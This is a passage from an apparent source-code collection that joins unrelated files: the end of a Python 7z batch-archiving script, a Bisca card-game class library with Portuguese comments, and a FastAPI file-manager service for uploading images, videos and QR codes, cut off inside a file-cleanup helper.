if not r and not zipped.has_key(full_path):
basename, extname = os.path.splitext(full_path)
if basename2zip.has_key(basename):
zip_fname = basename2zip[basename]
else:
if id_dict.has_key(dirname):
zip_file_id = id_dict[dirname]
else:
zip_file_id = 0
zip_fname, zip_file_id = gen_zipfile_name(dirname, zip_file_id)
id_dict[dirname] = zip_file_id
print "zip [{0}] ===> [{1}]".format(full_path, zip_fname)
cmds = ['7z', 'a', '-mhe=on']
if volume_size:
cmds.append('-v{0}'.format(volume_size))
if passwd:
cmds.append('-p{0}'.format(passwd))
cmds.extend([zip_fname, full_path])
r = subprocess.call(cmds)
if r == 0:
print "zip [{0}] ===> [{1}] ok".format(full_path, zip_fname)
basename2zip[basename] = zip_fname
if remove_origin:
print "remove [{0}]".format(full_path)
os.remove(full_path)
print "remove [{0}] done".format(full_path)
else:
print "zip [{0}] --> [{1}] fail, error code is {2}".format(full_path, zip_fname, r)
elif not r and remove_origin:
print "remove [{0}]".format(full_path)
os.remove(full_path)
print "remove [{0}] done".format(full_path)
def zip_walk(arg, dirname, fnames):
fnames_filter(fnames)
fnames.sort()
for fname in fnames:
zip_file(dirname, fname, arg)
def make_zip_file_list(zip_info):
lines = [re.split('\s+', line.strip()) for line in zip_info.split('\n')]
fields_k = None
field_names = ["Date", "Time", "Attr", "Size", "Compressed", "Name"]
for k in xrange(0, len(lines)):
line = lines[k]
all_field_found = True
for name in field_names:
if not name in line:
all_field_found = False
break
if all_field_found:
fields_k = k
break
dash_begin = None
dash_end = None
for k in xrange(fields_k+1, len(lines)):
line = lines[k]
if len(line) > 0:
all_dash = True
for s in line:
if not re.match('\-+$', s):
all_dash = False
break
if all_dash and all_dash > 0:
if not dash_begin:
if 'Name' in lines[k-1]:
dash_begin = k
elif not dash_end:
dash_end = k
Name_k = None
for k in xrange(0, len(lines[fields_k])):
if lines[fields_k][k] == 'Name':
Name_k = k
break
return [lines[k][Name_k] for k in xrange(dash_begin+1, dash_end)]
def check_file(dirname, fname, zipped):
full_path = os.path.join(dirname, fname)
if os.path.isfile(full_path):
if re.search("\.7z(\.0*1)?$", fname):
print "check [{0}]".format(full_path)
if passwd:
r = subprocess.check_output(['7z', 'l', '-p{0}'.format(passwd), full_path])
else:
r = subprocess.check_output(['7z', 'l', full_path])
for fn in make_zip_file_list(r):
full_fn = os.path.join(dirname, fn)
base_fn, ext_fn = os.path.splitext(full_fn)
zipped[full_fn] = full_path
basename2zip[base_fn] = full_path
print "check [{0}] done".format(full_path)
def check_walk(arg, dirname, fnames):
fnames_filter(fnames)
for fname in fnames:
check_file(dirname, fname, arg)
def zip_files(top_path):
os.path.walk(top_path, zip_walk, {})
def check_zipped(top_path):
zipped = {}
os.path.walk(top_path, check_walk, zipped)
print "----------------------------------------"
print "zipped:"
for (k,v) in zipped.items():
print k, "->", v
print "basename2zip:"
for (k,v) in basename2zip.items():
print k, "->", v
print "----------------------------------------"
return zipped
if __name__ == "__main__":
self_path = os.path.abspath(sys.argv[0])
argc = len(sys.argv)
passwd = None
remove_origin = False
volume_size = None
top_path = os.path.join(os.path.dirname(self_path))
if argc > 1 and len(sys.argv[1]) > 0:
passwd = sys.argv[1]
if argc > 2:
remove_origin = int(sys.argv[2]) == 1
if argc > 3 and len(sys.argv[3]) > 0:
top_path = os.path.abspath(sys.argv[3])
if argc > 4:
volume_size = sys.argv[4]
assert re.match("\d+[bkmg]$", volume_size)
print "zip files in [{0}] passwd:{1} remove_origin:{2} volume_size:{3}".format(top_path, passwd, remove_origin, volume_size)
basename2zip = {}
zipped = check_zipped(top_path)
zip_files(top_path)
```
|
{
"source": "Jexp97/Bisca_JV_num_01",
"score": 3
}
|
#### File: Jexp97/Bisca_JV_num_01/classes_base.py
```python
from random import shuffle
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#import tensorflow as tf
#from tensorflow import keras
import numpy as np
class Carta:
# Uma classe para definir o que é uma carta.
def __init__(self, naipe, numero, pontos=0):
# naipe: PAUS; OUROS; COPAS; ESPADAS
# numero: A(1),2,3,...,J,Q,K
#pontos: depende do jogo. Por padrão, todos vão receber 0.
self.__naipe = naipe # Do tipo string
self.__numero = numero # Do tipo string
self.__pontos = pontos # Do tipo integer
@property
def naipe(self):
# retorna o naipe da carta
return self.__naipe
@property
def numero(self):
# retorna o numero da carta
return self.__numero
@property
def pontos(self):
# retorna a quantidade de pontos da carta
return self.__pontos
def __str__(self):
# retorna o número e o naipe da carta. Por exemplo, 3.OUROS
# lembrando que tanto _numero quanto _naipe são strings.
return self.__numero + '.' + self.__naipe
class Baralho:
# Um baralho é composto por cartas. Aqui, a base é o baralho francês.
# Esta classe usa a classe Carta e servirá como base para outras classes a herdarem.
def __init__(self):
# O atributo cartas_no_baralho guarda a sequência de cartas que compõem o baralho.
self._cartas_no_baralho = []
self._naipes = ("ESPADAS", "PAUS", "COPAS", "OUROS")
self._numeros = ("A", "2", "3", "4", "5", "6", "7", "8", "9", "10", "J", "Q", "K", "Joker")
def embaralhar(self):
#Esta função embaralha a sequência do atributo cartas_no_baralho. É necessário importar o módulo random do python.
shuffle(self._cartas_no_baralho)
def tirar_uma_carta(self, posicao=None):
# Esta função tira a carta do topo do baralho na posição indicada e o devolve.
if (posicao != None):
return self._cartas_no_baralho.pop(posicao)
else:
return self._cartas_no_baralho.pop()
def __len__(self):
# Vai devolver o comprimento de __cartas_no_baralho.
return len(self._cartas_no_baralho)
def __str__(self):
# Vai devolver o conteúdo do baralho
conteudo_do_baralho = ""
for carta in self._cartas_no_baralho:
conteudo_do_baralho = (carta.__str__() + "\n") + conteudo_do_baralho
return conteudo_do_baralho
def contar_pontos(self):
# somar a quantidade de pontos no baralho
pontos = 0
for carta in self._cartas_no_baralho:
pontos += carta.pontos
return pontos
def adicionar_carta(self, carta):
# adicionando uma carta à pilha
self._cartas_no_baralho.append(carta)
class BaralhoDeBisca(Baralho):
def __init__(self, n_par_de_jogadores = True):
# Um baralho de bisca contém 40 cartas (baralho sujo) e, caso o número de jogadores
# seja ímpar, as cartas de 2 devem ser retiradas.
super().__init__()
self._numeros = ["A", "2", "3", "4", "5", "6", "7", "J", "Q", "K"]
self._pontos = {"A": 11, "2": 0, "3": 0, "4": 0, "5": 0, "6": 0, "7": 10, "J": 3, "Q": 2, "K": 4}
#criando o baralho
if (not n_par_de_jogadores):
# removendo '2' dos _numeros
self._numeros.remove('2')
for naipe in self._naipes:
for numero in self._numeros:
self._cartas_no_baralho.append(Carta(naipe,numero,self._pontos[numero]))
class Jogador:
# Classe base para jogadores
def __init__(self, nome):
self._nome = nome
self._pontos = 0
@property
def nome(self):
return self._nome
@property
def pontos(self):
return self._pontos
@pontos.setter
def pontos(self, novos_pontos):
self._pontos = novos_pontos
def somar_pontos(self, novos_pontos):
# novos_pontos pode ser tanto positivo quanto negativo!!
soma = self._pontos + novos_pontos
if (soma > 0):
self._pontos = soma
else:
self.pontos = 0
class JogadorDeBisca(Jogador):
# Classe a ser usada para o jogador de bisca
tamanho_max_mao = 3
def __init__(self, nome):
super().__init__(nome)
# Lista vai guardar o conteúdo da mão
self._mao = []
# Variável do tipo Baralho vai guardar a pilha de pontos (cartas)
self._pilha_de_pontos = Baralho()
def escolhe_carta_para_jogar(self, carta_da_mesa=None ,cartas_jogadas_na_mesa=None):
# Função para a escolha da carta a ser jogada pelo jogador humano
while(True):
# Mostrando as cartas na mão
print(self.nome)
print(self) # Deve imprimir as cartas da mão
if len(self._mao) == 3:
try:
print('Qual carta jogar? (1), (2) ou (3): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1' and carta_escolhida != '2' and carta_escolhida != '3'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
elif len(self._mao) == 2:
try:
print('Qual carta jogar? (1) ou (2): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1' and carta_escolhida != '2'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
else:
try:
print('Jogue sua última carta pressionando (1): ', end='')
carta_escolhida = input()
if (carta_escolhida != '1'):
raise
# Se a entrada for válida, saida do loop e devolva o valor da carta_escolhida
break
except:
print('Entrada inválida!')
return carta_escolhida
def adicionar_carta_na_mao(self, carta):
# carta deve ser do tipo Carta
self._mao.append(carta)
def retirar_carta_da_mao(self, posicao):
# vai retirar a carta da mão na posição marcada pelo parâmetro posicao
return self._mao.pop(int(posicao) - 1)
def __str__(self):
# Vai devolver uma string com o conteúdo da mão em um formato adequado.
conteudo_da_mao = ""
for carta in self._mao:
conteudo_da_mao = conteudo_da_mao + (carta.__str__() + " ")
return conteudo_da_mao
@property
def pilha_de_pontos(self):
return self._pilha_de_pontos
def adicionar_carta_na_pilha (self, carta):
# adiciona uma carta na pilha de pontos
self._pilha_de_pontos.adicionar_carta(carta)
def __len__(self):
# devolve o comprimento da lista _mao
return len(self._mao)
class DummyPlayer(JogadorDeBisca):
# Este jogador sempre escolhe a primeira carta da mão
def __init__(self, nome='Dummy'):
super().__init__(nome)
# Substitui o nome da carta por um ID ordenado pela força da carta
self._ID_de_carta = {"2": 0.1, "3": 0.2, "4": 0.3, "5": 0.4, "6": 0.5,
"7": 0.6, "J": 0.7, "Q": 0.8, "K": 0.9, "A": 1.0}
# Substitui o naipe por um ID
self._ID_de_naipe = {"ESPADAS": 0.25, "PAUS": 0.5, "COPAS": 0.75, "OUROS": 1.0}
def escolhe_carta_para_jogar(self, carta_da_mesa=None ,cartas_jogadas_na_mesa=None):
# Função que recebe a carta da mesa, as cartas já jogadas e escolhe
# uma na carta na mão
# No caso do DummyPlayer, a carta jogada sempre será a primeira disponível (1)
return 1
# O treinamento ainda não está funcionando bem :(
'''
class SmartPlayer(JogadorDeBisca):
# Este jogador tem uma rede neural treinada para escolher uma carta da mão
def __init__(self, nome='Smart'):
super().__init__(nome)
# Substitui o nome da carta por um ID ordenado pela força da carta
self._ID_de_carta = {"2": 0.1, "3": 0.2, "4": 0.3, "5": 0.4, "6": 0.5,
"7": 0.6, "J": 0.7, "Q": 0.8, "K": 0.9, "A": 1.0}
# Substitui o naipe por um ID
self._ID_de_naipe = {"ESPADAS": 0.25, "PAUS": 0.5, "COPAS": 0.75, "OUROS": 1.0}
# Criando a arquitetura da rede neural responsável pelas decisões de qual carta jogar
entradas = keras.Input(shape=(14,))
x = keras.layers.Dense(14, activation='relu', name='first_layer')(entradas)
x = keras.layers.Dense(7, activation='relu', name='second_layer')(x)
x = keras.layers.Dense(4, activation='relu', name='third_layer')(x)
saidas = keras.layers.Dense(3, activation='softmax', name='last_layer')(x)
self._tomador_de_decisao = keras.Model(inputs=entradas, outputs=saidas, name='tomador_de_decisao')
# Compilando o modelo. Ainda não sei se será necessário
self._tomador_de_decisao.compile(optimizer='adam',
loss=tf.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.metrics.SparseCategoricalAccuracy()])
# Carregando os parâmetros da rede treinada
self._tomador_de_decisao.load_weights('pesos_da_rede_neural_treinada_para_smart_player')
def salvar_pesos_da_rede(self, nome_do_arquivo_de_saida='pesos_salvos'):
# Esta função salva no disco os pesos da rede neural
try:
self._tomador_de_decisao.save_weights(nome_do_arquivo_de_saida)
except:
print('Algo deu errado na hora de salvar os pesos!')
raise
else:
print('Pesos da rede salvo com sucesso!')
def escolhe_carta_para_jogar(self, carta_da_mesa=None, cartas_jogadas_na_mesa=None):
# A partir das cartas na mão, da carta da mesa e das cartas já jogadas (x)
# vai escolher uma carta a ser jogada (y)
# A primeira coisa a se fazer e transformar as entradas em uma lista (numpy)
# que tem a ordem [ID_carta_1, ID_naipe_1, ..., ID_naipe_3, ID_carta_mesa, ID_naipe_mesa,...
# ... ID_carta_ja_jogada_1, ID_naipe_ja_jogado_1, ..., ID_naipe_ja_jogado_3]
#
# Essa lista deve ter um conter 14 itens. Caso não haja alguma informação,
# deve-se preencher com 0 a posição (por exemplo, não existe cartas jogadas ainda).
lista_de_entrada_do_decisor = []
# Preenchendo com o conteúdo da mão
for carta_na_mao in self._mao:
# Adiciona ID_carta
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_na_mao.numero
])
# Adiciona ID_naipe
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_na_mao.naipe
])
# Se a mão tinha menos do que 3 cartas, devo preencher o restante das posições
# com 0.
while (len(lista_de_entrada_do_decisor) < 6):
lista_de_entrada_do_decisor.append(0)
# Preenchendo com o conteúdo da carta da mesa
# Lembrando: carta_da_mesa deve ser do tipo Carta
if carta_da_mesa != None:
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_da_mesa.numero
])
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_da_mesa.naipe
])
# Preenchendo com o conteúdo das cartas jogadas
# Lembrando: cartas_jogadas_na_mesa deve ser uma lista com itens do tipo Carta
if cartas_jogadas_na_mesa != None:
for carta_ja_jogada in cartas_jogadas_na_mesa[:-1]:
# cartas_jogadas_na_mesa contabiliza todas as jogadas,
# isto é, numa mesa de 4 jogadores essa lista tem tamanho 4.
# Como só me interesso pela jogada dos outros jogadores,
# só preciso das n-1 primeiras entradas dessa lista.
if carta_ja_jogada != '':
# Se tem carta jogada, adiciona na lista
lista_de_entrada_do_decisor.append(self._ID_de_carta[
carta_ja_jogada.numero
])
lista_de_entrada_do_decisor.append(self._ID_de_naipe[
carta_ja_jogada.naipe
])
else:
# Caso contrário, adiciona 0 para o número e o naipe
lista_de_entrada_do_decisor.append(0)
lista_de_entrada_do_decisor.append(0)
# A lista de cartas_jogadas_na_mesa pode estar incompleta.
# Neste caso, deve-se preencher lista_de_entrada_do_decisor com 0s.
while (len(lista_de_entrada_do_decisor) < 14):
lista_de_entrada_do_decisor.append(0)
# Fazendo uma checagem de segurança
if (len(lista_de_entrada_do_decisor) != 14):
# Pare tudo que deu algo errado
raise
# Com essa lista montada, podemos colocá-la na entrada do decisor,
# gerando uma saída com três elementos (um para cada carta)
# A carta a ser jogada vai depender de qual desses elementos é o maior
# decisao = self._tomador_de_decisao(tf.convert_to_tensor(np.array([[lista_de_entrada_do_decisor],], dtype=np.float32)))
decisao = self._tomador_de_decisao(np.array([lista_de_entrada_do_decisor,]))
#print(decisao[0][0])
# É possível que decisao seja um tensor, o que mudaria a forma de acesso.
# decisao[0] --> carta_1
# decisao[1] --> carta_2
# decisao[2] --> carta_2
# Procurar o índice do argumento máximo
escolha = np.argmax(decisao) + 1
# argmax retorna um valor entre 0 e 2. Por isso, adiciono 1 para ficar compatível
# com a lógica.
# Preciso fazer o tratamento caso a mão tenha menos de três cartas e o decisor
# acabe escolhendo uma posição que não tenha carta
if len(self._mao) < 3 and escolha == 3:
# Escolheu uma posição que não existe carta
if (len(self._mao) > 1 and (decisao[0][1] > decisao[0][0])):
# A segunda maior probabilidade é da carta 2
# e na mão há duas cartas
escolha = 2
else:
# A segunda maior probabilidade é da carta 1
# neste caso não importa a quantidade de cartas na mão
escolha = 1
if len(self._mao) < 2 and escolha == 2:
# Escolheu uma posição que não existe carta
# Neste caso, só podemos ter a opção 1
escolha = 1
return escolha
# Pegando os pesos da rede neural. Retorna um array do numpy.
def get_pesos_da_rede_neural(self):
return self._tomador_de_decisao.get_weights()
# Configurando os pesos da rede neural. Deve receber um array do numpy compatível com
# a arquitetura da rede
def set_pesos_da_rede_neural(self, novos_pesos):
self._tomador_de_decisao.set_weights(novos_pesos)
'''
class MesaDeBisca():
# Classe a ser usada como base ao jogo de bisca
def __init__(self, numero_de_jogadores):
self._baralho = None #BaralhoDeBisca()
self._numero_de_jogadores = numero_de_jogadores
self._jogadores = []
self._cartas_jogadas = ['' for p in range(numero_de_jogadores)]
self._quem_jogou_as_cartas = ['' for p in range(numero_de_jogadores)]
#A ideia é que o nome do jogador apareça em _quem_jogou_as_cartas
#A partir de sua posição, pegar a carta jogada
self._carta_da_mesa = None
# A ideia é usar o parâmetro do número de jogadores para o jogo saber quando pode começar
# _jogadores deve ser uma lista com _numero_de_jogadores JogadorDeBisca
self._equipe_A = []
self._pontos_A = 0
self._equipe_B = []
self._pontos_B = 0
# Após completar a lista _jogadores, as listas _equipe_? vão ser preenchidas
def adicionar_jogador(self, nome):
# função a ser chamada para preencher a lista de jogadores
if (len(self._jogadores) < self._numero_de_jogadores):
while(True):
try:
print('\n Escolha o tipo do jogador: ')
print('(1) Jogador humano')
print('(2) NPC Dummy')
#print('(3) NPC Smart')
tipo_do_jogador = input()
if (int(tipo_do_jogador) == 1):
self._jogadores.append(JogadorDeBisca(nome))
print('Jogador humano adicionado!')
break
elif (int(tipo_do_jogador) == 2):
self._jogadores.append(DummyPlayer(nome))
print('NPC Dummy adicionado!')
break
#elif (int(tipo_do_jogador) == 3):
# self._jogadores.append(SmartPlayer(nome))
# print('NPC Smart adicionado!')
# break
else:
raise
except:
print('Por favor, digite um numero entre as opcoes em parenteses!')
else:
print("Não é possível adicionar mais jogadores!")
def dividir_equipes(self):
# função a ser chamada para preencher as listas de equipes
if (len(self._jogadores) == self._numero_de_jogadores):
# adiciona na equipe A os jogadores que estiverem em uma ordem PAR na lista de jogadores
self._equipe_A = \
[player for player in self._jogadores if ((self._jogadores.index(player)% 2) == 0)]
# adiciona na equipe B os jogadores que estiverem em uma ordem ÍMPAR na lista de jogadores
self._equipe_B = \
[player for player in self._jogadores if ((self._jogadores.index(player)% 2) != 0)]
else:
print("A lista de jogadores precisa estar completa!")
@property
def equipe_A(self):
return self._equipe_A
@property
def equipe_B(self):
return self._equipe_B
@property
def jogadores(self):
return self._jogadores
def __len__(self):
return self._baralho.__len__()
@property
def cartas_jogadas(self):
return self._cartas_jogadas
@property
def carta_da_mesa(self):
return self._carta_da_mesa
def puxar_uma_carta(self, index_do_jogador):
# função para tirar uma carta do baralho (ou da mesa) e passar para o jogador
# preciso passar a posição do jogador na lista de jogadores
if (len(self._baralho) > 0):
# ainda há cartas no baralho
carta = self._baralho.tirar_uma_carta()
self._jogadores[index_do_jogador].adicionar_carta_na_mao(carta)
else:
# crio uma cópia da carta da mesa e dou ao jogador
# esta condição só deve ocorrer uma única vez!!!
carta = Carta(self._carta_da_mesa.naipe, self._carta_da_mesa.numero)
self._jogadores[index_do_jogador].adicionar_carta_na_mao(carta)
# def mostrar_carta_do_jogador(self, index_do_jogador):
# # mostra as cartas do jogador identificado por index_do_jogador (posição da lista de jogadores)
# print(self._jogadores[index_do_jogador].nome)
# print(self._jogadores[index_do_jogador])
def prepara_a_mesa(self):
# função para gerar o baralho, preencher a carta da mesa e dar 3 cartas iniciais aos jogadores
self._baralho = BaralhoDeBisca(self._numero_de_jogadores % 2 == 0)
self._baralho.embaralhar()
self._carta_da_mesa = self._baralho.tirar_uma_carta()
for player in self._jogadores:
while (len(player) < JogadorDeBisca.tamanho_max_mao):
# vai dando cartas ao jogador até preencher 3 na mão
self.puxar_uma_carta(self._jogadores.index(player))
def atualiza_cartas_jogadas(self, player, carta_jogada, vez):
# adiciona na lista de jogadas um elemento do tipo [jogador, carta_jogada]
# vez indica a posição nas listas. Vai de 0 a numero_de_jogadores-1
if (vez < self._numero_de_jogadores):
self._quem_jogou_as_cartas[vez] = player
self._cartas_jogadas[vez] = carta_jogada
else:
print("Erro! O número excedeu a quantidade de jogadores!")
def encerra_rodada (self):
# identifica quem jogou a carta mais forte e retorna o nome para que o jogo saiba quem começa depois
pos = 0 #qual a posição em cartas_jogadas
jogador_mais_forte = None
carta_mais_forte = self._cartas_jogadas[pos] # qual a carta para efeito de comparação
for jogada in self._cartas_jogadas: #tá preenchendo errado o cartas_jogadas
if jogada.naipe == carta_mais_forte.naipe:
# se o naipe for igual, quem define a mais forte é a pontuação
if jogada.pontos >= carta_mais_forte.pontos:
carta_mais_forte = jogada
jogador_mais_forte = self._quem_jogou_as_cartas[pos] #jogador
else: #naipes diferentes
# se o naipe é diferente, preciso verificar se a nova carta verificada é da mesa
if jogada.naipe == self._carta_da_mesa.naipe:
carta_mais_forte = jogada
jogador_mais_forte = self._quem_jogou_as_cartas[pos] #jogador
pos += 1
if jogador_mais_forte in self._equipe_A:
# se o jogador da carta mais forte da rodada está na equipe A
for carta in self._cartas_jogadas:
# adicionar cada carta das jogadas na pilha de pontos dos jogadores da equipe A
for jogador in self._equipe_A:
jogador.adicionar_carta_na_pilha(carta)
else:
# se o jogador da carta mais forte da rodada está na equipe B
for carta in self._cartas_jogadas:
# adicionar cada carta das jogadas na pilha de pontos dos jogadores da equipe B
for jogador in self._equipe_B:
jogador.adicionar_carta_na_pilha(carta)
self._cartas_jogadas = ['' for p in range(self._numero_de_jogadores)]
# esvaziar a lista de cartas jogadas
self._quem_jogou_as_cartas = ['' for p in range(self._numero_de_jogadores)]
# esvaziar a lista de quem jogou as cartas
return jogador_mais_forte
def acabou_jogo(self):
# verifica se a mão de todos os jogadores esvaziou. Se sim, retorna True.
# Caso contrário, retorna False.
acabou_jogo = True
for jogador in self._jogadores:
if (len(jogador) != 0):
acabou_jogo = False
break
return acabou_jogo
def imprimir_mesa(self):
# método para imprimir o conteúdo da mesa
if self._numero_de_jogadores == 2:
print (self._jogadores[0].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0].nome)]\
.__str__()) # tipo Carta !!!!
print ('\n\n')
print('Mesa: {}'.format(self._carta_da_mesa.__str__()))
print ('\n\n')
print (self._jogadores[1].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[1].nome)]\
.__str__()) # tipo Carta
elif self._numero_de_jogadores == 3:
print (self._jogadores[0].nome) # nome do jogador
print (self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0].nome)]\
.__str__()) # tipo Carta
print ('\n\n')
print('Mesa: {}'.format(self._carta_da_mesa.__str__()))
print ('\n\n')
print ('{} || {}'.format
(self._jogadores[1].nome, self._jogadores[2].nome))
# nome do jogador
print ('{} || {}'.format
(self._cartas_jogadas[self._quem_jogou_as_cartas.index(self._jogadores[1].nome)]\
.__str__(), self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[2].nome)].__str__()))
# tipo Carta
elif self._numero_de_jogadores == 4:
print('\n')
print(40*'-')
print ('\n{} || {}'.format
(self._jogadores[0].nome, self._jogadores[1].nome))
# nome do jogador fixado
try:
print('{} || '.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[0])].__str__()), end='')
except:
print(' || ', end='')
try:
print('{}'.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[1])].__str__()))
except:
print(' ')
print ('\n\n')
print('Mesa: {} ({})'.format(self._carta_da_mesa.__str__(), len(self._baralho)))
print ('\n\n')
print ('{} || {}'.format
(self._jogadores[3].nome, self._jogadores[2].nome)) # invertido!!
# nome do jogador
try:
print('{} || '.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[3])].__str__()), end='')
except:
print(' || ', end='')
try:
print('{}'.format(self._cartas_jogadas\
[self._quem_jogou_as_cartas.index(self._jogadores[2])].__str__()))
except:
print(' ')
print(40*'-')
print ('\n\n')
# Pode ter mais, porém vou parar em 4 por enquanto
def imprimir_pontos(self):
# método para exibir os pontos em formato de tabela
print('\n.----------------------------------------.')
print('|------------TABELA DE PONTOS------------|')
print('|----------------------------------------|')
print('| |')
print('| EQUIPE A {:03d} pontos |'.format\
(self._equipe_A[0]._pilha_de_pontos.contar_pontos()))
print('| |')
print('| EQUIPE B {:03d} pontos |'.format\
(self._equipe_B[0]._pilha_de_pontos.contar_pontos()))
print('.----------------------------------------.')
print('\n')
```
|
{
"source": "JexPY/filemanager-fastapi",
"score": 2
}
|
#### File: api/app/main.py
```python
from fastapi import FastAPI, File, UploadFile, BackgroundTasks, Depends, HTTPException,status,Query
from fastapi.responses import FileResponse
from fastapi.middleware.cors import CORSMiddleware
from fastapi.security import HTTPBearer,OAuth2AuthorizationCodeBearer,HTTPBasicCredentials
from fastapi.staticfiles import StaticFiles
from fastapi.middleware.cors import CORSMiddleware
from dotenv import load_dotenv
from typing import List,Optional
import os
import sys
from services.serveUploadedFiles import handle_upload_image_file, handle_multiple_image_file_uploads, handle_upload_video_file
from services.serveQrcode import handle_qr_code
from services.security.customBearerCheck import validate_token
from services.storage.local import response_image_file
from services.serveDataFromUrl import handle_download_data_from_url, handle_multiple_image_file_downloads
load_dotenv()
app = FastAPI(docs_url=None if os.environ.get('docs_url') == 'None' else '/docs', redoc_url=None if os.environ.get('redoc_url') == 'None' else '/redoc')
# If you want to serve files from local server you need to mount your static file directory
if os.environ.get('PREFERED_STORAGE') == 'local' and 'pytest' not in sys.modules.keys():
app.mount("/static", StaticFiles(directory="static"), name="static")
# If you want cors configuration also possible thanks to fast-api
origins = os.environ.get('CORS_ORIGINS').split(',')
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
@app.get("/", tags=["main"])
def root(
cpu_load: Optional[str] = Query(
False,
description='True/False depending your needs, gets average CPU load value',
regex='^(True|False)$'
),
token: str = Depends(validate_token)):
result = {
"Hello": f"Token is {token}",
}
if cpu_load == 'True':
result['cpu_average_load'] = os.getloadavg()
return result
# File size validates NGINX
@app.post("/image", tags=["image"])
async def upload_image_file(
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
description='True/False depending your needs',
regex='^(True|False)$'
),
file: UploadFile = File(...),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_upload_image_file(True if thumbnail == 'True' else False, file)
@app.post("/images", tags=["image"])
async def upload_image_files(
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
description='True/False depending your needs',
regex='^(True|False)$'
),
files: List[UploadFile] = File(...),
OAuth2AuthorizationCodeBearer = Depends(validate_token)
):
fileAmount = len(files)
if fileAmount > int(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT')):
raise HTTPException(
status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE,
detail='Amount of files must not be more than {}'.format(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT'))
)
return handle_multiple_image_file_uploads(files, fileAmount, True if thumbnail == 'True' else False)
@app.get("/image", tags=["image"])
async def get_image(
image: str = Query(...,
description='uploaded image name',
max_length=50
),
image_type: str = Query(
...,
description='Should provide verision of image you want from localStorage original, thumbnail or qrImage',
regex='^(original|thumbnail|qrImage)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)
):
return response_image_file(image, image_type)
@app.post("/qrImage", tags=["image"])
async def text_to_generate_qr_image(
qr_text: str = Query(
...,
description='Provide text to generate qr image',
),
with_logo: Optional[str] = Query(
os.environ.get('QR_IMAGE_WITH_LOGO'),
description='True/False depending your needs default is {}'.format(os.environ.get('QR_IMAGE_WITH_LOGO')),
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_qr_code(qr_text, True if with_logo == 'True' else False)
@app.post("/video", tags=["video"])
async def upload_video_file(
optimize: Optional[str] = Query(
os.environ.get('VIDEO_OPTIMIZE'),
description='True/False depending your needs default is {}'.format(os.environ.get('VIDEO_OPTIMIZE')),
regex='^(True|False)$'
),
file: UploadFile = File(..., description='Allows mov, mp4, m4a, 3gp, 3g2, mj2'),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_upload_video_file(True if optimize == 'True' else False, file)
@app.get("/imageUrl", tags=["from url"])
async def image_from_url(
image_url: str = Query(
None,
description = "Pass valid image url to upload",
min_length = 5
),
thumbnail: Optional[str] = Query(
os.environ.get('IMAGE_THUMBNAIL'),
description='True/False depending your needs',
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_download_data_from_url(image_url, True if thumbnail == 'True' else False, file_type='image')
@app.get("/imageUrls", tags=["from url"])
async def images_from_urls(
image_urls: List[str] = Query(
None,
description = "Pass valid image urls to upload",
min_length = 5
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
fileAmount = len(image_urls)
if fileAmount > int(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT')):
raise HTTPException(
status_code=status.HTTP_413_REQUEST_ENTITY_TOO_LARGE,
detail='Amount of files must not be more than {}'.format(os.environ.get('MULTIPLE_FILE_UPLOAD_LIMIT'))
)
return handle_multiple_image_file_downloads(image_urls, fileAmount)
@app.get("/videoUrl", tags=["from url"])
async def video_from_url(
video_url: str = Query(
None,
description = "Pass valid video url to upload",
min_length = 5
),
optimize: Optional[str] = Query(
os.environ.get('VIDEO_OPTIMIZE'),
description='True/False depending your needs default is {}'.format(os.environ.get('VIDEO_OPTIMIZE')),
regex='^(True|False)$'
),
OAuth2AuthorizationCodeBearer = Depends(validate_token)):
return handle_download_data_from_url(video_url, False, True if optimize == 'True' else False, file_type='video')
```
#### File: services/helpers/alena.py
```python
import os
from pathlib import Path
def cleaning_service(pathsToClean, images = False, videos = False):
if images:
if pathsToClean.get('original'):
if Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).is_file():
Path(os.environ.get('IMAGE_ORIGINAL_LOCAL_PATH') + pathsToClean['original']).unlink()
if pathsToClean.get('thumbnail'):
if Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + pathsToClean['thumbnail']).is_file():
Path(os.environ.get('IMAGE_THUMBNAIL_LOCAL_PATH') + pathsToClean['thumbnail']).unlink()
if pathsToClean.get('qrImage'):
if Path(os.environ.get('QR_IMAGE_LOCAL_PATH') + pathsToClean['qrImage']).is_file():
Path(os.environ.get('QR_IMAGE_LOCAL_PATH') + pathsToClean['qrImage']).unlink()
elif videos:
if pathsToClean.get('original'):
